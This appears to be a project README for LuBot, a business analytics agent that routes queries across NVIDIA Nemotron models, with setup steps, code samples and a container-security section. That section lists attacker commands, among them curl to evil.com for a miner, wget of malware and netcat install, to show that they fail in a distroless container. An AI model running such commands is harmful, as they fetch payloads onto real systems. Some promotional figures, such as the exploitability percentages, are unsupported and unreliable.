AI-powered business analytics agent built on 6 NVIDIA models: Ultra 253B, Nano 8B, Vision 12B VL, NV-EmbedQA-E5-v5 + self-hosted RTX 4090. 4-tier intent routing, PhD-level statistical analysis. Live at lubot.ai

LuBot

[Diagram: LuBot NVIDIA routing architecture]

Watch 10-min Demo  |  Try Live   (password: nemotron)

I built LuBot alone, from zero, over the last 8 months. 100% powered by NVIDIA — cloud APIs + self-hosted GPU.

LuBot.ai is live right now. Real business users. PhD-level statistical insights. A self-learning RAG system that gets smarter over time — finding patterns in your data that consultants charge thousands to discover.

Real math. Real statistics. The best of NVIDIA.

[Screenshot: LuBot home page]


TECHNICAL INNOVATION

The LuBot Cascade — 4-Tier Intent Routing

Open Interactive Cascade Visualization →

The idea came from a simple instinct: if the agent can figure out what the user wants without calling an LLM, it should. Most AI apps send every user message to an LLM just to classify intent. That's slow and expensive. I built a 4-stage cascade that tries the cheapest method first and only escalates when needed — 95% of routing decisions cost zero LLM tokens:

Tier 0 - Deterministic Detection (0ms)
|-- PhD Analysis, Correlation, Concentration, Anomaly, Web Search
|-- Caught by keywords/regex instantly

Tier 1 - Core Intents (80% of queries, 0ms)
|-- GREETING, IDENTITY, DATA_QUERY, WEB_SEARCH, PREDICTION
|-- DOCUMENT_GENERATION, MEMORY_RECALL, CAPABILITIES
|-- Pattern matching - no AI needed

Tier 2 - NVIDIA Embeddings (15% of queries, 5ms)
|-- ADVICE_REQUEST, FOLLOWUP, CLARIFICATION, DEEP_DIVE
|-- Semantic matching with NV-EmbedQA-E5-v5

Tier 3 - NVIDIA LLM Fallback (5% of queries, 100ms)
|-- Ambiguous queries, Complex multi-intent, Edge cases
|-- Only these need Nemotron Nano 8B

Note: The LuBot Cascade saves LLM calls for the routing decision only. The actual analysis and response generation still uses NVIDIA Nemotron models (Nano 8B or Ultra 253B depending on complexity).
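As a sketch, the cascade above is a chain of cheap checks that escalate only on a miss. Everything below is illustrative, not LuBot's actual API: the keyword lists are truncated, and `embedding_match` / `llm_classify` are stand-ins for the real Tier 2 (NV-EmbedQA cosine similarity) and Tier 3 (Nemotron Nano 8B) steps.

```python
import re

# Illustrative 4-tier cascade: try the cheapest router first, escalate on a miss.
PHD_KEYWORDS = re.compile(r"\b(correlation|anomaly|concentration|hhi)\b", re.I)
CORE_PATTERNS = {
    "GREETING":   re.compile(r"^(hi|hello|hey)\b", re.I),
    "DATA_QUERY": re.compile(r"\b(how many|revenue|count|average)\b", re.I),
}

def embedding_match(query: str):
    """Tier 2 stand-in: the real system compares NV-EmbedQA vectors."""
    return None  # placeholder: no semantic index in this sketch

def llm_classify(query: str) -> str:
    """Tier 3 stand-in: the real system asks Nemotron Nano 8B."""
    return "UNKNOWN"

def classify(query: str) -> tuple[str, int]:
    # Tier 0: deterministic PhD-analysis detection (0ms, zero tokens)
    if PHD_KEYWORDS.search(query):
        return ("PHD_ANALYSIS", 0)
    # Tier 1: core intents via pattern matching (0ms, zero tokens)
    for intent, pattern in CORE_PATTERNS.items():
        if pattern.search(query):
            return (intent, 1)
    # Tier 2: semantic matching (~5ms, one embedding call)
    if (intent := embedding_match(query)) is not None:
        return (intent, 2)
    # Tier 3: LLM fallback for the remaining ~5% (~100ms)
    return (llm_classify(query), 3)

print(classify("hello there"))          # ("GREETING", 1)
print(classify("correlation of x, y"))  # ("PHD_ANALYSIS", 0)
```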

The 3-Tier Response System (Smart Model Routing)

Routes queries to the optimal NVIDIA model based on complexity:

Tier 0 - DIRECT (No LLM Needed, 0ms)
|-- Simple aggregation: COUNT, SUM, AVG with 1 row result
|-- Example: "How many employees?" → "You have 320 employees"
|-- Templates only, no tokens used

Tier 1 - ENHANCED (Nemotron Nano 8B, 50ms)
|-- Medium complexity: GROUP BY with 2-10 rows, basic analysis
|-- Example: "Revenue by department" → Table + "Sales is highest at $2M"
|-- Fast, 50K tokens/sec

Tier 2 - FULL PhD (Nemotron Ultra 253B, 500ms)
|-- Statistical analysis OR >10 rows requiring deep insights
|-- correlation, concentration, simpsons_paradox, outliers, trend
|-- Example: "Correlation between sales and marketing?" → "Pearson r=0.95, p<0.001"
|-- 253 billion parameters for real PhD-level analysis
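The tier decision itself is simple enough to sketch: route on result size and on whether statistical analysis was requested. The thresholds come straight from the tiers above; the function name is hypothetical.

```python
def pick_response_tier(row_count: int, needs_stats: bool) -> int:
    """Hypothetical sketch of the 3-tier response decision described above."""
    if needs_stats or row_count > 10:
        return 2  # FULL PhD: Nemotron Ultra 253B
    if 2 <= row_count <= 10:
        return 1  # ENHANCED: Nemotron Nano 8B
    return 0      # DIRECT: template only, no LLM tokens

print(pick_response_tier(1, False))  # 0 - "How many employees?"
print(pick_response_tier(5, False))  # 1 - "Revenue by department"
print(pick_response_tier(3, True))   # 2 - "Correlation between sales and marketing?"
```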

Self-Learning RAG System

One of LuBot's most distinctive features is its self-learning RAG system, which retrieves insights from your interactions and surfaces data patterns you can't see by eye. The more you use it, the more it remembers about your business, your preferences, and your needs. Over time, LuBot becomes a partner that knows your business inside out. Seventeen batch workers run every night so it never misses important data.

RAG & Embedding Pipeline — NVIDIA NV-EmbedQA-E5-V5

Every vector operation in LuBot is powered by NVIDIA NV-EmbedQA-E5-V5 — a 1024-dimensional semantic embedding model with 335M parameters.

Text Input → NVIDIA Embed (1024-dim Vector) → FAISS Index → Retrieved Context (Top-K) → Augmented LLM → Grounded Response

6 Embedding-Powered Features:

| Feature | How It Works |
|---|---|
| Document RAG | Uploaded files are chunked and embedded into 1024-dim vectors. FAISS retrieves relevant passages to ground LLM responses in real data. |
| Tier 2 Intent Matching | User queries are embedded and compared via cosine similarity to known intent vectors. Semantic routing without LLM calls. |
| Conversation Embeddings | Every conversation is indexed as vectors, enabling semantic memory search across all past interactions. |
| Semantic Clustering | A nightly batch worker groups similar queries by vector proximity, discovering usage patterns automatically. |
| Few-Shot RAG Learning | Retrieves similar past Q&A pairs as few-shot examples. Response quality improves with every conversation. |
| FAISS Vector Search | Facebook AI Similarity Search engine. Sub-millisecond approximate nearest-neighbor lookup across all vector indexes. |
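The retrieval step in the pipeline above can be sketched in a few lines. For brevity this uses tiny hand-made vectors and brute-force cosine similarity in place of 1024-dim NV-EmbedQA embeddings and a FAISS index; the shape of the operation (embed, score, take top-k) is the same.

```python
import math

def cosine(a: list[float], b: list[float]) -> float:
    """Cosine similarity between two vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(x * x for x in b))
    return dot / (norm_a * norm_b)

def top_k(query_vec: list[float], index: dict, k: int = 2) -> list[str]:
    """Return the k chunk ids most similar to the query vector."""
    scored = sorted(index.items(), key=lambda kv: cosine(query_vec, kv[1]), reverse=True)
    return [chunk_id for chunk_id, _ in scored[:k]]

# Toy "index": chunk id -> embedding (FAISS would hold these in LuBot)
index = {
    "q3_revenue": [0.9, 0.1, 0.0],
    "hr_policy":  [0.0, 0.2, 0.9],
    "q4_revenue": [0.8, 0.2, 0.1],
}
print(top_k([1.0, 0.0, 0.0], index, k=2))  # revenue chunks rank first
```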

Two Data Modes

My Files — Upload CSV, Excel, PDF, or any structured data. Private storage with 10GB free. Document QA powered by Ultra 253B + FAISS vector search.

Website Data — Connect live data sources directly. The demo includes real traffic data from my personal portfolio website LuboBali.com — live visitors, page views, time on page, referrers. This demonstrates how LuBot can connect to any other business website to analyze live data automatically. No manual uploads needed.

See DATA_SCHEMA.md for sample table structures.


EFFECTIVE USE OF NVIDIA TECHNOLOGY

| # | Technology | Model / Service | Purpose |
|---|---|---|---|
| 1 | Nemotron Ultra 253B | nvidia/llama-3.1-nemotron-ultra-253b-v1 | Intent routing, query enrichment, Document QA, PhD-level analysis |
| 2 | Nemotron Nano 8B | nvidia/llama-3.1-nemotron-nano-8b-v1 | Code generation, fast analytics, simple queries |
| 3 | Nemotron Vision 12B VL | nvidia/nemotron-nano-12b-v2-vl | Image & screenshot analysis, multi-modal understanding |
| 4 | NV-EmbedQA-E5-v5 | nvidia/nv-embedqa-e5-v5 | 1024-dim semantic embeddings for intent matching |
| 5 | NIM API | integrate.api.nvidia.com/v1 | Cloud inference endpoint (OpenAI-compatible) |
| 6 | Self-hosted GPU | NVIDIA RTX 4090 (24GB VRAM) | Nemotron-mini (2.7GB) + Nemotron-3-Nano (24GB) via Ollama |
| 7 | Nemotron-3-Nano-30B | nemotron-3-nano (24GB local) | Enterprise on-premise deployment |
| 8 | AdalFlow | Framework | LLM orchestration framework |

100% NVIDIA Stack — Self-hosted RTX 4090 running Nemotron locally. NIM API delivering Nano 8B, Ultra 253B, and Vision 12B from the cloud. 6 NVIDIA models + 1024-dim embeddings for semantic matching. 8 technologies. Every layer. Every request. 99%+ success rate.

Smart Model Routing — 4-Tier Intent Classification + 3-Tier Response System. The right NVIDIA model for every query. Simple questions get Nano 8B. PhD analysis gets Ultra 253B. No wasted compute.

Batched Embeddings — 125 canonical examples pre-computed in 4 batched API calls (not 125 individual calls). Startup time: 3 seconds instead of 27.
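The batching itself is just list chunking: send one request per slice instead of one per example. A minimal sketch, assuming a batch size of 32 (any size giving four requests for 125 items works the same way):

```python
def batches(items: list, batch_size: int) -> list:
    """Split items into consecutive slices, one embedding API call each."""
    return [items[i:i + batch_size] for i in range(0, len(items), batch_size)]

canonical_examples = [f"intent example {i}" for i in range(125)]
api_calls = batches(canonical_examples, 32)
print(len(api_calls))                   # 4 batched calls instead of 125
print(sum(len(b) for b in api_calls))   # 125 - every example still embedded
```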

[Screenshot: Correlation analysis — PhD level, powered by Ultra 253B]

[Screenshot: Heatmap visualization]


POTENTIAL IMPACT & USEFULNESS

The Problem

Big consulting companies and hedge funds charge thousands of dollars to look at your business data and tell you what actually matters. Most small and medium businesses can't afford that. They sit on millions of customer records with no way to figure out what those numbers are really saying.

The Solution

I built LuBot to change that.

LuBot is an AI-powered business analytics platform that helps real businesses make smarter decisions. You upload your data - CSV, Excel, whatever you have - ask questions in plain English, and get back real statistical analysis. Not just pretty charts. Real math. Correlation analysis, Simpson's Paradox detection, market concentration (HHI), anomaly detection, forecasting. The kind of stuff that a PhD data scientist at McKinsey would give you, but in language that a CEO can actually understand and act on.

LuBot is designed for profitable businesses. This is not a toy. You get real math and statistics delivered straight to you in the chat interface, or you can generate PDF reports with all the insights. You can build interactive charts, visualize your data flow, save those charts and share them with your partners.

Try it yourself at lubot.ai - upload your data and start asking questions.

[Screenshot: Data upload]

Privacy is Not Optional

LuBot never mixes user data and never shares data between users. Everything is private: only you can access your data, and you can delete everything at any time. If you need full control over your data, LuBot can run exclusively for your enterprise on your own infrastructure using NVIDIA Nemotron-3-Nano-30B as the local model, so nothing ever leaves your network.


QUALITY OF DOCUMENTATION & PRESENTATION

Live Demo

The best way to understand LuBot is to try it: lubot.ai

Upload a CSV or Excel file, ask questions about your data, and watch it route through the NVIDIA models in real time. You'll see direct answers for simple questions, enhanced analysis for medium ones, and full PhD-level statistical breakdowns for complex queries.

Video Walkthrough

Watch 10-min Demo — Full feature demonstration

Production Numbers

| Metric | Value |
|---|---|
| Codebase | 112,270 lines of code |
| Python files | 248 |
| AI tools | 28 (SQL, charts, PhD analysis, RAG, predictions) |
| Database | 34 tables, 450+ columns (Neon hot + B2 cold storage) |
| API endpoints | 40+ (FastAPI) |
| Batch workers | 17 nightly workers for self-learning |
| NVIDIA success rate | 99%+ |
| Response time | 8-10 seconds (first query), 8 seconds (warm) |
| NVIDIA models | 6 (Ultra 253B, Nano 8B, Vision 12B VL, NV-EmbedQA-E5-v5, Nemotron-3-Nano 30B, Nemotron-mini 2.7B) |
| Infrastructure | Hetzner Cloud US, Docker, Neon PostgreSQL, Backblaze B2, RTX 4090 |
| Built by | One person. 8 months. Still going. |

Quick Start

```bash
git clone https://github.com/lubobali/LuBot-NVIDIA-AI-Agent.git
cd LuBot-NVIDIA-AI-Agent
pip install -r requirements.txt
export NVIDIA_API_KEY="nvapi-your-key-here"  # free at https://build.nvidia.com

# Optional: self-hosted GPU (RunPod + Ollama)
export GPU_SERVER_URL="http://your-runpod-ip:11434"
export GPU_MODEL_NAME="nemotron-mini"  # or nemotron-3-nano for 30B

python demo/quickstart.py
```

The demo runs through all components - intent classification, response tier routing, and NVIDIA model calls. Even without an API key the intent classifier and response router work offline. With GPU_SERVER_URL set, Tier 1 queries route to your self-hosted NVIDIA GPU first.

Code Examples

```python
from nvidia_routing import NVIDIAClient

client = NVIDIAClient()

# Simple question -> Nano 8B (fast, cheap)
response = client.chat_tier1(
    messages=[{"role": "user", "content": "Top 3 revenue drivers?"}]
)

# PhD question -> Ultra 253B (253 billion parameters)
response = client.chat_tier2(
    messages=[{"role": "user", "content": "Explain Simpson's Paradox with a business example."}]
)
```

```python
from nvidia_routing import get_llm_router

router = get_llm_router()

# Full routing: GPU (self-hosted) → NVIDIA NIM API → Groq fallback
# Tier 1: GPU first (if GPU_SERVER_URL set), then NIM Nano 8B
response = router.chat_completion(
    tier=1,
    messages=[{"role": "user", "content": "Top 5 customers by revenue"}],
)
print(response.provider)  # "gpu" or "nvidia" or "groq"

# Tier 2: always NVIDIA NIM Ultra 253B (PhD-level analysis)
response = router.chat_completion(
    tier=2,
    messages=[{"role": "user", "content": "Calculate HHI for this market"}],
)
print(response.used_fallback)  # False 99% of the time
```

```python
from intent_routing import IntentClassifier

classifier = IntentClassifier()

# Tier 0 - instant deterministic detection
intent, tier, conf = classifier.classify("What's the correlation between age and salary?")
# -> ("DATA_QUERY", 0, 1.0)
```

Files in This Repo

```
intelligence/                  — PhD-Level Analysis Engine (6,235 lines)
  __init__.py                  — Facade composing all 9 analyzers into a unified engine
  paradox.py                   — Simpson's Paradox detection; mix/rate decomposition
  drivers.py                   — McKinsey-style driver analysis; Shapley attribution
  concentration.py             — HHI concentration risk (DOJ/FTC regulatory standard)
  correlation.py               — Lagged correlation, leading-indicator detection
  anomaly.py                   — Anomaly detection against learned baselines
  statistical.py               — Mann-Kendall trend test, Welch's t-test, power analysis

storage/                       — Hot/Cold Storage Architecture
  data_warmer.py               — Neon (hot) ↔ Backblaze B2 (cold) data lifecycle

nvidia_routing/                — NVIDIA Model Integration
  llm_router.py                — Main router: NVIDIA primary, Groq fallback, smart error handling
  nvidia_client.py             — Clean NVIDIA API wrapper: pick a model, send messages, get a response
  nvidia_embeddings.py         — NVIDIA embeddings; SentenceTransformer-compatible drop-in
  llm_router_client.py         — Adapter that makes the router work with the AdalFlow Generator
  response_tier_router.py      — Decides: direct answer vs enhanced vs full PhD analysis

intent_routing/                — The LuBot Cascade
  intent_classifier.py         — The 4-tier classification cascade; brains of the routing
  correlation_detector.py      — Deterministic PhD query detection; keywords before LLM, always

demo/
  quickstart.py                — Run this first; all components working together
  sample_queries.py            — 15 queries showing how routing decisions get made
```
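As one concrete example of what the intelligence/ analyzers compute: the HHI behind concentration.py is the sum of squared market shares. A minimal sketch of the metric itself, not the repo's actual implementation:

```python
def hhi(shares_pct: list[float]) -> float:
    """Herfindahl-Hirschman Index: sum of squared market shares (in percent).
    Under the DOJ/FTC 2010 merger guidelines, HHI above 2500 marks a highly
    concentrated market."""
    return sum(s ** 2 for s in shares_pct)

# Four firms holding 40/30/20/10 percent of a market:
print(hhi([40, 30, 20, 10]))  # 3000 -> highly concentrated
```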

PRODUCTION SECURITY — Distroless Containers

LuBot runs in production with Google's distroless container architecture — the same security pattern used by Google, Netflix, and Stripe.

Standard Container vs Distroless

| Capability | Standard Alpine | LuBot Distroless |
|---|---|---|
| Shell (/bin/sh, /bin/bash) | Yes | No |
| Package manager (apt, apk) | Yes | No |
| Download tools (wget, curl) | Yes | No |
| File utilities (chmod, rm) | Yes | No |
| Attack surface | 93% exploitable | 0.01% |

Defense Layers

  • Distroless Base Image — Google's gcr.io/distroless — contains only app + runtime, zero OS tools
  • Non-Root Execution — All containers run as UID 1000 — no privilege escalation possible
  • Read-Only Filesystem — Immutable container filesystem — nothing can be written or modified
  • Network Isolation — UFW firewall rules — only ports 80, 443, 22 exposed

What Happens When an Attacker Gets In

```
$ docker exec container /bin/sh   → exec failed: no such file or directory
$ wget malware.sh                 → command not found
$ curl evil.com/miner             → command not found
$ apt install netcat              → command not found
# Attacker is trapped in an empty room with no tools
```

Even if an attacker breaches the application layer, there are no tools inside the container to escalate privileges, download payloads, or pivot. The attacker is trapped.


MIT License

LuBot.ai — Powered by NVIDIA Nemotron
